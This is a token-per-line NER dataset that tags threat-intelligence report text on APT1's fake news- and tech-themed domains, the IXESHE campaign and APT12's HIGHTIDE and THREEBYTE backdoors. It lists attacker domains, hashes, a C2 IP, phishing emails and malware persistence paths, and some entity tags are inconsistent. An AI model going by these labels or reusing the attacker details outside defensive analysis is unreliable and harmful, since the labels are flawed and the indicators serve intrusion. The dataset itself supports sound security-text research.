+“ O
+shanghai O
+” O
+is O
+not O
+a O
+street O
+name O
+. O
+
+Nevertheless O
+, O
+it O
+is O
+noteworthy O
+that O
+Shanghai S-LOC
+appeared O
+in O
+the O
+first O
+known O
+APT1 S-APT
+domain O
+registration O
+, O
+along O
+with O
+a O
+phone O
+number O
+that O
+begins O
+with O
+China S-LOC
+’s O
+“ O
++86 O
+” O
+international O
+code O
+. O
+
+In O
+fact O
+, O
+Shanghai S-LOC
+was O
+listed O
+as O
+the O
+registrant O
+’s O
+city O
+in O
+at O
+least O
+24 O
+of O
+the O
+107 O
+( O
+22% O
+) O
+registrations O
+. O
+
+Overall O
+, O
+the O
+combination O
+of O
+a O
+relatively O
+high O
+number O
+of O
+“ O
+Shanghai S-LOC
+” O
+registrations O
+with O
+obviously O
+false O
+registration O
+examples O
+in O
+other O
+registrations O
+suggests O
+a O
+partially O
+uncoordinated O
+domain O
+registration O
+campaign O
+from O
+2004 S-TIME
+until O
+present O
+, O
+in O
+which O
+some O
+registrants O
+tried O
+to O
+fabricate O
+non-Shanghai S-LOC
+locations O
+but O
+others O
+did O
+not O
+. O
+
+This O
+is O
+supported O
+by O
+contextual O
+information O
+on O
+the O
+Internet O
+for O
+the O
+email S-TOOL
+address O
+“ O
+lfengg@163.com S-EMAIL
+, O
+” O
+which O
+was O
+supplied O
+in O
+the O
+registration O
+information O
+for O
+seven O
+of O
+the O
+107 O
+zones O
+. O
+
+On O
+the O
+site O
+“ O
+www.china-one.org S-DOM
+, O
+” O
+the O
+email S-TOOL
+address O
+“ O
+lfengg@163.com S-EMAIL
+” O
+appears O
+as O
+the O
+contact O
+for O
+the O
+Shanghai S-LOC
+Kai B-IDTY
+Optical I-IDTY
+Information I-IDTY
+Technology E-IDTY
+Co. O
+, O
+Ltd. O
+, O
+a O
+website O
+production O
+company O
+located O
+in O
+a O
+part O
+of O
+Shanghai S-LOC
+that O
+is O
+across O
+the O
+river O
+from O
+PLA S-IDTY
+Unit B-IDTY
+61398 E-IDTY
+. O
+
+About O
+half O
+of O
+APT1 S-APT
+’s O
+known O
+zones O
+were O
+named O
+according O
+to O
+three O
+themes O
+: O
+news O
+, O
+technology O
+and O
+business O
+. O
+
+These O
+themes O
+cause O
+APT1 S-APT
+command O
+and O
+control O
+addresses O
+to O
+appear O
+benign O
+at O
+first O
+glance O
+. O
+
+However O
+, O
+we O
+believe O
+that O
+the O
+hundreds O
+of O
+FQDNs S-TOOL
+within O
+these O
+zones O
+were O
+created O
+for O
+the O
+purpose O
+of O
+APT1 S-APT
+intrusions O
+. O
+( O
+Note O
+: O
+these O
+themes O
+are O
+not O
+unique O
+to O
+APT1 S-APT
+or O
+even O
+APT O
+in O
+general O
+. O
+) O
+The O
+news-themed O
+zones O
+include O
+the O
+names O
+of O
+well-known O
+news O
+media O
+outlets O
+such O
+as O
+CNN S-IDTY
+, O
+Yahoo S-IDTY
+and O
+Reuters S-IDTY
+. O
+
+However O
+, O
+they O
+also O
+include O
+names O
+referencing O
+English-speaking O
+countries O
+, O
+such O
+as O
+“ O
+aunewsonline.com S-DOM
+” O
+( O
+Australia S-LOC
+) O
+, O
+“ O
+canadatvsite.com S-DOM
+” O
+( O
+Canada S-LOC
+) O
+, O
+and O
+“ O
+todayusa.org S-DOM
+” O
+( O
+U.S B-LOC
+. E-LOC
+) O
+. O
+
+Below O
+is O
+a O
+list O
+of O
+zones O
+registered O
+by O
+APT1 S-APT
+that O
+are O
+newsthemed O
+: O
+
+aoldaily.com S-DOM
+aunewsonline.com S-DOM
+canadatvsite.com S-DOM
+canoedaily.com S-DOM
+cnndaily.com S-DOM
+cnndaily.net S-DOM
+cnnnewsdaily.com S-DOM
+defenceonline.net S-DOM
+freshreaders.net S-DOM
+giftnews.org S-DOM
+reutersnewsonline.com S-DOM
+rssadvanced.org S-DOM
+saltlakenews.org S-DOM
+sportreadok.net S-DOM
+todayusa.org S-DOM
+usapappers.com S-DOM
+usnewssite.com S-DOM
+yahoodaily.com S-DOM
+. O
+
+The O
+technology-themed O
+zones O
+reference O
+well-known O
+technology O
+companies O
+( O
+AOL S-IDTY
+, O
+Apple S-IDTY
+, O
+Google S-IDTY
+, O
+Microsoft S-IDTY
+) O
+, O
+antivirus O
+vendors O
+( O
+McAfee S-IDTY
+, O
+Symantec S-IDTY
+) O
+, O
+and O
+products O
+( O
+Blackberry S-IDTY
+, O
+Bluecoat S-IDTY
+) O
+. O
+
+APT1 S-APT
+also O
+used O
+more O
+generic O
+names O
+referencing O
+topics O
+like O
+software O
+: O
+
+globalowa.com S-DOM
+gmailboxes.com S-DOM
+hugesoft.org S-DOM
+idirectech.com S-DOM
+ifexcel.com S-DOM
+infosupports.com S-DOM
+livemymsn.com S-DOM
+mcafeepaying.com S-DOM
+microsoft-update-info.com S-DOM
+micyuisyahooapis.com S-DOM
+msnhome.org S-DOM
+pcclubddk.net S-DOM
+progammerli.com S-DOM
+softsolutionbox.net S-DOM
+symanteconline.net S-DOM
+webservicesupdate.com S-DOM
+. O
+
+Finally O
+, O
+some O
+zones O
+used O
+by O
+APT1 S-APT
+reflect O
+a O
+business O
+theme O
+. O
+
+The O
+names O
+suggest O
+websites O
+that O
+professionals O
+might O
+visit O
+: O
+
+advanbusiness.com S-DOM
+businessconsults.net S-DOM
+businessformars.com S-DOM
+companyinfosite.com S-DOM
+conferencesinfo.com S-DOM
+copporationnews.com S-DOM
+. O
+
+APT1 S-APT
+intruders O
+often O
+use O
+the O
+FQDNs S-TOOL
+that O
+are O
+associated O
+with O
+legitimate O
+websites O
+hosted O
+by O
+their O
+hop O
+points O
+. O
+
+We O
+consider O
+these O
+domains O
+to O
+be O
+“ O
+hijacked O
+” O
+because O
+they O
+were O
+registered O
+by O
+someone O
+for O
+a O
+legitimate O
+reason O
+, O
+but O
+have O
+been O
+leveraged O
+by O
+APT1 S-APT
+for O
+malicious O
+purposes O
+. O
+
+APT1 S-APT
+uses O
+hijacked O
+FQDNs S-TOOL
+for O
+two O
+main O
+purposes O
+. O
+
+First O
+, O
+they O
+place O
+malware O
+( O
+usually O
+in O
+ZIP S-TOOL
+files O
+) O
+on O
+the O
+legitimate O
+websites O
+hosted O
+on O
+the O
+hop O
+point O
+and O
+then O
+send O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+a O
+link O
+that O
+includes O
+the O
+legitimate O
+FQDN S-TOOL
+. O
+
+
+APT12 S-APT
+. O
+
+This O
+research O
+paper O
+will O
+delve O
+into O
+another O
+prominent O
+group O
+of O
+attackers O
+referred O
+to O
+as O
+“ O
+IXESHE S-APT
+” O
+( O
+pronounced O
+“ O
+i-sushi O
+” O
+) O
+, O
+based O
+on O
+one O
+of O
+the O
+more O
+common O
+detection O
+names O
+security O
+companies O
+use O
+for O
+the O
+malware O
+they O
+utilize O
+. O
+
+This O
+campaign O
+is O
+notable O
+for O
+targeting O
+East O
+Asian O
+governments O
+, O
+electronics O
+manufacturers O
+, O
+and O
+a O
+telecommunications O
+company O
+. O
+
+The O
+IXESHE S-APT
+campaign O
+makes O
+use O
+of O
+targeted O
+emails S-TOOL
+with O
+malicious O
+attachments O
+to O
+compromise O
+victims O
+’ O
+systems O
+. O
+
+The O
+emails S-TOOL
+are O
+often O
+tailored O
+for O
+specific O
+victims O
+and O
+contain O
+malicious O
+attachments O
+that O
+are O
+almost O
+always O
+“ O
+weaponized O
+” O
+.PDF S-FILE
+files O
+with O
+known O
+exploits O
+that O
+drop O
+malware O
+executables O
+onto O
+targeted O
+systems O
+. O
+
+In O
+addition O
+, O
+the O
+IXESHE S-APT
+attackers O
+conducted O
+two O
+specific O
+attacks O
+that O
+leveraged O
+zero-day S-VULNAME
+exploits—one O
+in O
+2009 O
+and O
+another O
+in O
+2011 O
+. O
+
+The O
+IXESHE S-APT
+attackers O
+almost O
+always O
+make O
+use O
+of O
+compromised O
+servers O
+as O
+command-and-control S-TOOL
+( O
+C&C S-TOOL
+) O
+servers O
+. O
+
+In O
+some O
+cases O
+, O
+the O
+compromised O
+servers O
+are O
+hosted O
+on O
+target O
+organizations O
+’ O
+networks O
+after O
+successful O
+infiltration O
+so O
+the O
+attackers O
+can O
+increase O
+their O
+control O
+of O
+the O
+victims O
+’ O
+infrastructure O
+. O
+
+Using O
+this O
+approach O
+, O
+the O
+attackers O
+amassed O
+at O
+least O
+60 O
+C&C S-TOOL
+servers O
+over O
+time O
+. O
+
+This O
+technique O
+also O
+allows O
+the O
+attackers O
+to O
+cover O
+their O
+tracks O
+, O
+as O
+having O
+the O
+C&C S-TOOL
+server O
+in O
+the O
+victims O
+’ O
+corporate O
+networks O
+means O
+very O
+little O
+C&C S-TOOL
+traffic O
+leaves O
+them O
+. O
+
+The O
+attackers O
+’ O
+deliberate O
+use O
+of O
+compromised O
+machines O
+and O
+dynamic O
+Domain B-PROT
+Name I-PROT
+System E-PROT
+( O
+DNS S-PROT
+) O
+services O
+allows O
+them O
+to O
+hide O
+traces O
+of O
+their O
+presence O
+by O
+confusing O
+their O
+activities O
+with O
+data O
+belonging O
+to O
+legitimate O
+individuals O
+. O
+
+Looking O
+at O
+threat O
+intelligence O
+derived O
+from O
+tracking O
+APT O
+campaigns O
+over O
+time O
+primarily O
+based O
+on O
+the O
+network O
+traffic O
+generated O
+by O
+the O
+malware O
+used O
+, O
+we O
+were O
+able O
+to O
+develop O
+indicators O
+of O
+compromise O
+for O
+the O
+IXESHE S-APT
+campaign O
+. O
+
+The O
+malware O
+samples O
+used O
+in O
+this O
+campaign O
+were O
+not O
+very O
+complicated O
+by O
+nature O
+but O
+do O
+give O
+the O
+attackers O
+almost O
+complete O
+control O
+over O
+their O
+targets O
+’ O
+compromised O
+systems O
+. O
+
+Most O
+of O
+the O
+IP O
+addresses O
+of O
+IXESHE S-APT
+’s O
+victims O
+are O
+linked O
+to O
+DSL S-TOOL
+networks O
+, O
+which O
+made O
+it O
+difficult O
+to O
+determine O
+their O
+identities O
+. O
+
+Careful O
+research O
+, O
+however O
+, O
+allowed O
+the O
+identification O
+of O
+some O
+of O
+the O
+attackers O
+’ O
+victims O
+: O
+East O
+Asian O
+governments O
+, O
+Taiwanese O
+electronics O
+manufacturers O
+, O
+A O
+telecommunications O
+company O
+. O
+
+Campaign O
+victims O
+were O
+identified O
+by O
+using O
+Whois S-TOOL
+records O
+and O
+open O
+source O
+research O
+. O
+
+Trend B-SECTEAM
+Micro E-SECTEAM
+generally O
+notifies O
+customers O
+that O
+are O
+believed O
+to O
+have O
+been O
+specifically O
+targeted O
+by O
+APT O
+campaigns O
+. O
+
+The O
+IXESHE S-APT
+attackers O
+have O
+been O
+actively O
+launching O
+highly O
+targeted O
+attacks O
+since O
+at O
+least O
+July O
+2009 O
+. O
+
+Available O
+data O
+on O
+the O
+IXESHE S-APT
+campaign O
+indicates O
+that O
+targeted O
+emails S-TOOL
+with O
+malicious O
+.PDF S-FILE
+file O
+attachments O
+were O
+the O
+attackers O
+’ O
+vector O
+of O
+choice O
+. O
+
+In O
+most O
+cases O
+, O
+the O
+attacks O
+involved O
+Adobe B-TOOL
+Acrobat E-TOOL
+, O
+Reader S-TOOL
+, O
+and O
+Flash B-TOOL
+Player E-TOOL
+exploits O
+such O
+as O
+: O
+CVE-2009-4324 S-VULID
+, O
+CVE-2009-0927 S-VULID
+, O
+CVE-2011-0609 S-VULID
+, O
+CVE-2011-0611 S-VULID
+. O
+
+It O
+should O
+also O
+be O
+noted O
+that O
+this O
+campaign O
+used O
+CVE-2009-4324 S-VULID
+and O
+CVE-2011-0609 S-VULID
+exploits O
+when O
+these O
+were O
+still O
+unpatched O
+or O
+considered O
+zero-day S-VULNAME
+vulnerabilities O
+. O
+
+The O
+IXESHE S-APT
+attackers O
+also O
+used O
+an O
+exploit O
+that O
+affected O
+Microsoft S-IDTY
+Excel S-TOOL
+— O
+CVE-2009-3129 S-VULID
+. O
+
+Every O
+IXESHE S-APT
+case O
+we O
+examined O
+revealed O
+that O
+the O
+original O
+infection O
+vector O
+was O
+a O
+targeted O
+email S-TOOL
+with O
+a O
+PDF S-TOOL
+exploit O
+as O
+attachment O
+. O
+
+Older O
+versions O
+also O
+used O
+an O
+XLS S-TOOL
+exploit O
+. O
+
+Opening O
+the O
+.PDF S-FILE
+file O
+drops O
+and O
+executes O
+a O
+malware O
+in O
+a O
+victim O
+’s O
+system O
+. O
+
+The O
+malware O
+displays O
+a O
+blank O
+.PDF O
+file O
+or O
+a O
+decoy O
+document O
+related O
+to O
+the O
+targeted O
+attack O
+. O
+
+The O
+emails S-TOOL
+normally O
+come O
+from O
+compromised O
+personal O
+accounts O
+or O
+are O
+entirely O
+spoofed O
+. O
+
+emails S-TOOL
+from O
+spoofed O
+senders O
+were O
+usually O
+sent O
+via O
+mail O
+servers O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+China S-LOC
+. O
+
+The O
+malware O
+also O
+sets O
+the O
+executable O
+file O
+’s O
+attributes O
+to O
+“ O
+Hidden. O
+” O
+Some O
+of O
+the O
+file O
+names O
+the O
+attackers O
+used O
+include O
+: O
+winhlps.exe S-FILE
+, O
+acrotry.exe S-FILE
+, O
+AcroRd32.exe S-FILE
+, O
+Updater.exe S-FILE
+. O
+
+In O
+order O
+for O
+the O
+malware O
+to O
+survive O
+rebooting O
+, O
+it O
+normally O
+creates O
+the O
+following O
+registry O
+run O
+key O
+: O
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run O
+. O
+
+The O
+registry O
+run O
+key O
+, O
+in O
+turn O
+, O
+points O
+to O
+the O
+malware O
+that O
+has O
+been O
+dropped O
+. O
+
+The O
+value O
+name O
+of O
+this O
+entry O
+varies O
+from O
+sample O
+to O
+sample O
+. O
+
+Some O
+of O
+the O
+names O
+the O
+attackers O
+used O
+for O
+it O
+include O
+: O
+Adobe B-TOOL
+Assistant E-TOOL
+, O
+Migrated S-TOOL
+. O
+
+Upon O
+installation O
+, O
+the O
+malware O
+starts O
+communicating O
+with O
+one O
+of O
+its O
+C&C S-TOOL
+servers O
+. O
+
+Most O
+of O
+the O
+samples O
+appeared O
+to O
+have O
+at O
+least O
+three O
+C&C S-TOOL
+servers O
+hard O
+coded O
+for O
+redundancy O
+. O
+
+Some O
+samples O
+alternatively O
+use O
+an O
+FGKD.jsp S-FILE
+or O
+an O
+FPK.jsp S-FILE
+file O
+. O
+
+The O
+Base64 S-ENCR
+blob O
+is O
+of O
+particular O
+interest O
+. O
+
+It O
+makes O
+use O
+of O
+a O
+custom O
+Base64 S-ENCR
+alphabet O
+. O
+
+Once O
+decoded O
+, O
+this O
+blob O
+reveals O
+a O
+standardized O
+structure O
+of O
+the O
+information O
+sent O
+to O
+the O
+registered O
+C&C S-TOOL
+server O
+, O
+which O
+includes O
+the O
+following O
+details O
+: O
+Computer O
+name O
+, O
+Local O
+IP O
+address O
+, O
+Proxy O
+server O
+IP O
+and O
+port O
+, O
+Malware O
+ID O
+. O
+
+To O
+date O
+, O
+we O
+have O
+seen O
+several O
+custom O
+Base64 S-ENCR
+alphabets O
+, O
+including O
+: O
++NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA O
+, O
+HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O
+, O
+j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we O
+mKckJLBofCDrs9VtWXlEu O
+, O
+p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ O
+zPgUx67FMhYb8q3wemKc O
+, O
+aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O
+, O
+ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O
+. O
+
+Some O
+similarities O
+exist O
+across O
+different O
+versions O
+of O
+the O
+Base64 S-ENCR
+alphabet O
+, O
+which O
+indicates O
+that O
+these O
+are O
+most O
+likely O
+not O
+completely O
+randomly O
+generated O
+. O
+
+Instead O
+, O
+the O
+attackers O
+manually O
+cut O
+and O
+pasted O
+older O
+versions O
+after O
+altering O
+some O
+parts O
+. O
+
+The O
+malware O
+ID O
+seems O
+to O
+be O
+a O
+campaign O
+code O
+with O
+a O
+different O
+IP O
+address O
+for O
+each O
+attack O
+. O
+
+Some O
+of O
+the O
+campaign O
+codes O
+we O
+have O
+seen O
+include O
+: O
+CRML_0505 S-MAL
+, O
+CRML_MIL S-MAL
+, O
+Firebox4 S-MAL
+, O
+JUST_0525 S-MAL
+, O
+ML0628 S-MAL
+, O
+MW0629 S-MAL
+, O
+OM222 S-MAL
+. O
+
+The O
+IXESHE S-APT
+campaign O
+has O
+been O
+successfully O
+executing O
+targeted O
+attacks O
+since O
+2009 O
+. O
+
+The O
+attackers O
+primarily O
+use O
+malicious O
+.PDF S-FILE
+files O
+that O
+exploit O
+vulnerabilities O
+in O
+Adobe B-TOOL
+Reader E-TOOL
+, O
+Acrobat S-TOOL
+, O
+and O
+Flash B-TOOL
+Player E-TOOL
+, O
+including O
+the O
+use O
+of O
+two O
+zero-day S-VULNAME
+exploits—one O
+in O
+2009 O
+and O
+another O
+in O
+2011 O
+. O
+
+While O
+the O
+attackers O
+primarily O
+targeted O
+East O
+Asian O
+governments O
+in O
+the O
+past O
+, O
+they O
+have O
+also O
+started O
+targeting O
+a O
+telecommunications O
+company O
+and O
+electronics O
+manufacturers O
+. O
+
+They O
+kept O
+track O
+of O
+their O
+targeted O
+attacks O
+by O
+embedding O
+a O
+“ O
+campaign O
+tag O
+” O
+in O
+the O
+malware O
+that O
+appears O
+to O
+describe O
+when O
+each O
+attack O
+was O
+launched O
+and O
+, O
+in O
+some O
+cases O
+, O
+the O
+nature O
+of O
+its O
+target O
+. O
+
+We O
+found O
+more O
+than O
+40 O
+of O
+these O
+campaign O
+tags O
+. O
+
+The O
+IXESHE S-APT
+attackers O
+are O
+notable O
+for O
+their O
+use O
+of O
+compromised O
+machines O
+within O
+a O
+target O
+’s O
+internal O
+network O
+as O
+C&C S-TOOL
+servers O
+. O
+
+This O
+helped O
+disguise O
+their O
+activities O
+. O
+
+In O
+addition O
+, O
+the O
+attackers O
+’ O
+use O
+of O
+the O
+proxy O
+tool O
+, O
+HTran S-TOOL
+, O
+also O
+helped O
+mask O
+their O
+true O
+location O
+. O
+
+While O
+their O
+identities O
+remain O
+unknown O
+, O
+the O
+attackers O
+behind O
+the O
+IXESHE S-APT
+campaign O
+demonstrated O
+that O
+they O
+were O
+both O
+determined O
+and O
+capable O
+. O
+
+While O
+the O
+malware O
+used O
+in O
+the O
+attacks O
+were O
+not O
+very O
+complicated O
+by O
+nature O
+, O
+these O
+proved O
+very O
+effective O
+. O
+
+
+APT12 S-APT
+. O
+
+The O
+attackers O
+referred O
+to O
+as O
+APT12 S-APT
+( O
+also O
+known O
+as O
+IXESHE S-APT
+, O
+DynCalc S-APT
+, O
+and O
+DNSCALC S-APT
+) O
+recently O
+started O
+a O
+new O
+campaign O
+targeting O
+organizations O
+in O
+Japan S-LOC
+and O
+Taiwan S-LOC
+. O
+
+APT12 S-APT
+is O
+believed O
+to O
+be O
+a O
+cyber O
+espionage O
+group O
+thought O
+to O
+have O
+links O
+to O
+the O
+Chinese B-IDTY
+People's I-IDTY
+Liberation I-IDTY
+Army E-IDTY
+. O
+
+APT12 S-APT
+'s O
+targets O
+are O
+consistent O
+with O
+larger O
+People's B-IDTY
+Republic I-IDTY
+of I-IDTY
+China E-IDTY
+( O
+PRC S-IDTY
+) O
+goals O
+. O
+
+Intrusions O
+and O
+campaigns O
+conducted O
+by O
+this O
+group O
+are O
+in-line O
+with O
+PRC S-IDTY
+goals O
+and O
+self-interest O
+in O
+Taiwan S-LOC
+. O
+
+Additionally O
+, O
+the O
+new O
+campaigns O
+we O
+uncovered O
+further O
+highlight O
+the O
+correlation O
+between O
+APT O
+groups O
+ceasing O
+and O
+retooling O
+operations O
+after O
+media O
+exposure O
+, O
+as O
+APT12 S-APT
+used O
+the O
+same O
+strategy O
+after O
+compromising O
+the O
+New B-IDTY
+York I-IDTY
+Times E-IDTY
+in O
+Oct O
+2012 O
+. O
+
+Much O
+like O
+Darwin O
+’s O
+theory O
+of O
+biological O
+evolution O
+, O
+APT12 S-APT
+been O
+forced O
+to O
+evolve O
+and O
+adapt O
+in O
+order O
+to O
+maintain O
+its O
+mission O
+. O
+
+FireEye S-SECTEAM
+researchers O
+discovered O
+two O
+possibly O
+related O
+campaigns O
+utilizing O
+two O
+other O
+backdoors O
+known O
+as O
+THREEBYTE S-MAL
+and O
+WATERSPOUT S-MAL
+. O
+
+Both O
+backdoors O
+were O
+dropped O
+from O
+malicious O
+documents O
+built O
+utilizing O
+the O
+“ O
+Tran B-TOOL
+Duy I-TOOL
+Linh E-TOOL
+” O
+exploit O
+kit O
+, O
+which O
+exploited O
+CVE-2012-0158 S-VULID
+. O
+
+These O
+documents O
+were O
+also O
+emailed O
+to O
+organizations O
+in O
+Japan S-LOC
+and O
+Taiwan S-LOC
+. O
+
+While O
+APT12 S-APT
+has O
+previously O
+used O
+THREEBYTE S-MAL
+, O
+it O
+is O
+unclear O
+if O
+APT12 S-APT
+was O
+responsible O
+for O
+the O
+recently O
+discovered O
+campaign O
+utilizing O
+THREEBYTE S-MAL
+. O
+
+Similarly O
+, O
+WATERSPOUT S-MAL
+is O
+a O
+newly O
+discovered O
+backdoor O
+and O
+the O
+threat O
+actors O
+behind O
+the O
+campaign O
+have O
+not O
+been O
+positively O
+identified O
+. O
+
+However O
+, O
+the O
+WATERSPOUT S-MAL
+campaign O
+shared O
+several O
+traits O
+with O
+the O
+RIPTIDE S-MAL
+and O
+HIGHTIDE S-MAL
+campaign O
+that O
+we O
+have O
+attributed O
+to O
+APT12 S-APT
+. O
+
+From O
+October O
+2012 O
+to O
+May O
+2014, O
+FireEye S-SECTEAM
+observed O
+APT12 S-APT
+utilizing O
+RIPTIDE S-MAL
+, O
+a O
+proxy-aware O
+backdoor O
+that O
+communicates O
+via O
+HTTP S-PROT
+to O
+a O
+hard-coded O
+command B-TOOL
+and I-TOOL
+control E-TOOL
+( O
+C2 S-TOOL
+) O
+server O
+. O
+
+RIPTIDE S-MAL
+’s O
+first O
+communication O
+with O
+its O
+C2 S-TOOL
+server O
+fetches O
+an O
+encryption O
+key O
+, O
+and O
+the O
+RC4 S-ENCR
+encryption O
+key O
+is O
+used O
+to O
+encrypt O
+all O
+further O
+communication O
+. O
+
+In O
+June O
+2014, O
+Arbor S-IDTY
+Networks O
+published O
+an O
+article O
+describing O
+the O
+RIPTIDE B-MAL
+backdoor E-MAL
+and O
+its O
+C2 S-TOOL
+infrastructure O
+in O
+great O
+depth O
+. O
+
+The O
+blog O
+highlighted O
+that O
+the O
+backdoor O
+was O
+utilized O
+in O
+campaigns O
+from O
+March O
+2011 O
+till O
+May O
+2014 O
+. O
+
+Following O
+the O
+release O
+of O
+the O
+article O
+, O
+FireEye S-SECTEAM
+observed O
+a O
+distinct O
+change O
+in O
+RIPTIDE S-MAL
+’s O
+protocols O
+and O
+strings O
+. O
+
+We O
+suspect O
+this O
+change O
+was O
+a O
+direct O
+result O
+of O
+the O
+Arbor S-IDTY
+blog O
+post O
+in O
+order O
+to O
+decrease O
+detection O
+of O
+RIPTIDE S-MAL
+by O
+security O
+vendors O
+. O
+
+The O
+changes O
+to O
+RIPTIDE S-MAL
+were O
+significant O
+enough O
+to O
+circumvent O
+existing O
+RIPTIDE S-MAL
+detection O
+rules O
+. O
+
+FireEye S-SECTEAM
+dubbed O
+this O
+new O
+malware O
+family O
+HIGHTIDE S-MAL
+. O
+
+On O
+Sunday O
+August O
+24, O
+2014 O
+we O
+observed O
+a O
+spear B-ACT
+phish E-ACT
+email S-TOOL
+sent O
+to O
+a O
+Taiwanese B-IDTY
+government E-IDTY
+ministry O
+. O
+
+Attached O
+to O
+this O
+email S-TOOL
+was O
+a O
+malicious O
+Microsoft S-IDTY
+Word S-TOOL
+document O
+( O
+MD5: O
+f6fafb7c30b1114befc93f39d0698560 S-MD5
+) O
+that O
+exploited O
+CVE-2012-0158 S-VULID
+. O
+
+It O
+is O
+worth O
+noting O
+that O
+this O
+email S-TOOL
+appeared O
+to O
+have O
+been O
+sent O
+from O
+another O
+Taiwanese B-IDTY
+Government E-IDTY
+employee O
+, O
+implying O
+that O
+the O
+email S-TOOL
+was O
+sent O
+from O
+a O
+valid O
+but O
+compromised O
+account O
+. O
+
+HIGHTIDE S-MAL
+: O
+6e59861931fa2796ee107dc27bfdd480 S-MD5
+. O
+
+The O
+HIGHTIDE B-MAL
+backdoor E-MAL
+connected O
+directly O
+to O
+141.108.2.157 S-IP
+. O
+
+If O
+you O
+compare O
+the O
+HTTP S-PROT
+GET O
+request O
+from O
+the O
+RIPTIDE S-MAL
+samples O
+to O
+the O
+HTTP S-PROT
+GET O
+request O
+from O
+the O
+HIGHTIDE S-MAL
+samples O
+you O
+can O
+see O
+the O
+malware O
+author O
+changed O
+the O
+following O
+items O
+: O
+User O
+Agent O
+, O
+Format O
+and O
+structure O
+of O
+the O
+HTTP S-PROT
+Uniform B-TOOL
+Resource I-TOOL
+Identifier E-TOOL
+( O
+URI S-TOOL
+) O
+. O
+
+Similar O
+to O
+RIPTIDE S-MAL
+campaigns O
+, O
+APT12 S-APT
+infects O
+target O
+systems O
+with O
+HIGHTIDE S-MAL
+using O
+a O
+Microsoft S-IDTY
+Word S-TOOL
+( O
+.doc S-FILE
+) O
+document O
+that O
+exploits O
+CVE-2012-0158 S-VULID
+. O
+
+FireEye S-SECTEAM
+observed O
+APT12 S-APT
+deliver O
+these O
+exploit O
+documents O
+via O
+phishing E-ACT
+emails S-TOOL
+in O
+multiple O
+cases O
+. O
+
+Based O
+on O
+past O
+APT12 S-APT
+activity O
+, O
+we O
+expect O
+the O
+threat O
+group O
+to O
+continue O
+to O
+utilize O
+phishing E-ACT
+as O
+a O
+malware O
+delivery O
+method O
+. O
+0824.1.doc S-FILE
+: O
+f6fafb7c30b1114befc93f39d0698560 S-MD5
+, O
+CVE-2012-0158 S-VULID
+. O
+
+Jason_invitation.doc S-FILE
+: O
+00a95fb30be2d6271c491545f6c6a707 S-MD5
+, O
+CVE-2012-0158 S-VULID
+. O
+
+When O
+the O
+file O
+is O
+opened O
+, O
+it O
+drops O
+HIGHTIDE S-MAL
+in O
+the O
+form O
+of O
+an O
+executable O
+file O
+onto O
+the O
+infected O
+system O
+. O
+
+RIPTIDE S-MAL
+and O
+HIGHTIDE S-MAL
+differ O
+on O
+several O
+points O
+: O
+executable O
+file O
+location O
+, O
+image O
+base O
+address O
+, O
+the O
+User-Agent O
+within O
+the O
+GET O
+requests O
+, O
+and O
+the O
+format O
+of O
+the O
+URI S-TOOL
+. O
+
+The O
+RIPTIDE S-MAL
+exploit O
+document O
+drops O
+its O
+executable O
+file O
+into O
+the O
+C:\Documents O
+and O
+Settings\{user}\Application O
+Data\Location O
+folder O
+while O
+the O
+HIGHTIDE S-MAL
+exploit O
+document O
+drops O
+its O
+executable O
+file O
+into O
+the O
+C:\DOCUMENTS O
+and O
+SETTINGS\{user}\LOCAL O
+SETTINGS\Temp\ O
+folder O
+. O
+
+All O
+but O
+one O
+sample O
+that O
+we O
+identified O
+were O
+written O
+to O
+this O
+folder O
+as O
+word.exe S-FILE
+. O
+
+The O
+one O
+outlier O
+was O
+written O
+as O
+winword.exe S-FILE
+. O
+
+Research O
+into O
+this O
+HIGHTIDE S-MAL
+campaign O
+revealed O
+APT12 S-APT
+targeted O
+multiple O
+Taiwanese B-IDTY
+Government E-IDTY
+organizations O
+between O
+August O
+22 O
+and O
+28 O
+. O
+
+On O
+Monday O
+August O
+25, O
+2014 O
+we O
+observed O
+a O
+different O
+spear B-ACT
+phish E-ACT
+email S-TOOL
+sent O
+from O
+lilywang823@gmail.com S-EMAIL
+to O
+a O
+technology O
+company O
+located O
+in O
+Taiwan S-LOC
+. O
+
+This O
+spear B-ACT
+phish E-ACT
+contained O
+a O
+malicious O
+Word S-TOOL
+document O
+that O
+exploited O
+CVE-2012-0158 S-VULID
+. O
+
+The O
+MD5 S-ENCR
+of O
+the O
+exploit O
+document O
+was O
+e009b95ff7b69cbbebc538b2c5728b11 S-MD5
+. O
+
+Similar O
+to O
+the O
+newly O
+discovered O
+HIGHTIDE S-MAL
+samples O
+documented O
+above O
+, O
+this O
+malicious O
+document O
+dropped O
+a O
+backdoor O
+to O
+C:\DOCUMENTS O
+and O
+SETTINGS\{user}\LOCAL O
+SETTINGS\Temp\word.exe S-FILE
+. O
+
+THREEBYTE S-MAL
+: O
+16e627dbe730488b1c3d448bfc9096e2 S-MD5
+. O
+
+This O
+backdoor O
+sent O
+the O
+following O
+callback O
+traffic O
+to O
+video.csmcpr.com S-DOM
+. O
+
+The O
+THREEBYTE S-MAL
+spear B-ACT
+phishing E-ACT
+incident O
+( O
+while O
+not O
+yet O
+attributed O
+) O
+shared O
+the O
+following O
+characteristics O
+with O
+the O
+above O
+HIGHTIDE S-MAL
+campaign O
+attributed O
+to O
+APT12 S-APT
+: O
+The O
+THREEBYTE B-MAL
+backdoor E-MAL
+was O
+compiled O
+two O
+days O
+after O
+the O
+HIGHTIDE B-MAL
+backdoors E-MAL
+; O
+
+Both O
+the O
+THREEBYTE S-MAL
+and O
+HIGHTIDE B-MAL
+backdoors E-MAL
+were O
+used O
+in O
+attacks O
+targeting O
+organizations O
+in O
+Taiwan S-LOC
+; O
+
+Both O
+the O
+THREEBYTE S-MAL
+and O
+HIGHTIDE B-MAL
+backdoors E-MAL
+were O
+written O
+to O
+the O
+same O
+filepath O
+of O
